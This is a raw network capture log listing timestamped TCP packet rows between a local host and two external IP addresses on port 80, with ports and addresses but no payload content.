Jul 26, 2024 12:57:50.003957987 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004048109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004064083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004080057 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004093885 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004095078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004106045 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004110098 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004126072 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004143000 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004154921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004313946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004328966 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004358053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004379988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004437923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004455090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004470110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004484892 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004492998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004494905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004512072 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004513979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004528999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004544973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.004600048 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004600048 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004616976 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.004616976 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005017042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005033016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005048037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005062103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005069017 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005074978 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005079031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005094051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005108118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005108118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005110025 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005125999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005129099 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005140066 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005141020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005156994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005171061 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005173922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005188942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005194902 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005206108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005213976 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005245924 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005779028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005795002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005810022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005825043 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005827904 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005841017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005855083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005856991 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005872011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005877018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005884886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005892038 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005902052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005917072 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005918980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005927086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005934000 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005945921 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005949974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005964041 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005968094 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.005975962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.005994081 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006012917 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006340981 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006356955 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006371021 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006383896 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006388903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006401062 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006418943 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006426096 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006494999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006510019 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006525040 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006539106 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006541014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006557941 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006561041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006567001 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006568909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006573915 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006580114 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006586075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006587982 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006592035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006617069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006618977 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006620884 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006622076 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.006635904 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.006663084 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.056432009 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.056473017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.056495905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.056499958 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.056519032 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.056529999 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.056606054 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.056622028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.056636095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.056647062 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.056652069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.056659937 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.056677103 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.056689024 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.096759081 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.096781969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.096797943 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.096812963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.096828938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.096842051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.096844912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.096862078 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.096863031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.096879005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.096894979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.096911907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.096935987 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097019911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097034931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097049952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097064018 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097064972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097080946 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097081900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097090006 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097096920 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097111940 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097124100 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097142935 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097326994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097342968 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097358942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097369909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097373962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097382069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097389936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097399950 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097405910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097412109 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097429037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097440004 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097913980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097929001 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097944021 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097958088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097968102 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097974062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097975016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.097989082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.097995043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098005056 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098017931 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098018885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098035097 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098041058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098051071 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098057985 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098066092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098081112 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098081112 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098105907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098126888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098171949 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098211050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098258972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098274946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098298073 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098306894 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098404884 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098421097 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098437071 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098445892 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098453999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098458052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098475933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098483086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098800898 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098817110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098846912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098859072 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098881960 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098901033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.098927021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098934889 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.098997116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099013090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099037886 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099052906 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099131107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099145889 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099169016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099178076 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099286079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099299908 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099315882 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099328041 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099330902 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099339962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099348068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099364042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099366903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099371910 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099391937 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099410057 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099579096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099617004 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099678993 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099695921 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099710941 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099724054 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099725962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099735975 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099741936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.099760056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099766016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.099786043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100048065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100063086 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100076914 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100090981 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100092888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100102901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100106001 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100121975 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100138903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100147009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100311995 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100351095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100357056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100367069 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100379944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100389957 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100397110 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100402117 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100413084 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100420952 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100429058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100434065 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100445032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100455046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100460052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100471020 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100475073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100491047 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100501060 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.100505114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100518942 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.100538969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101035118 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101051092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101067066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101080894 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101084948 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101097107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101103067 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101114035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101128101 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101129055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101144075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101151943 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101169109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101176977 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101185083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101197004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101207972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101212025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101218939 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101232052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101237059 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101259947 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101285934 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101923943 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101938963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101953030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101967096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101974964 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101982117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.101991892 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.101998091 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102013111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102014065 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102029085 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102030039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102040052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102044106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102058887 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102060080 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102068901 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102075100 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102087021 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102091074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102103949 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102107048 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102121115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102122068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102130890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102138042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102149010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102150917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102168083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102179050 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102195024 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102732897 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102749109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102762938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102777958 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102778912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102792978 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102796078 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102806091 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102808952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102823973 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102824926 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:50.102839947 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102848053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.102866888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:50.116724968 CEST	60838	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:50.117063046 CEST	60839	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:50.122008085 CEST	80	60839	185.215.113.16	192.168.2.6
